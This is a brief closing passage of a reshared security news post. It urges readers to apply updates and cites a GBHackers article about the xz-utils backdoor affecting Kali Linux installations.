Users are encouraged to promptly apply updates and stay informed on the latest security advisories.

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.

The post xz-utils Backdoor Affects Kali Linux Installations – How to Check for Infection appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder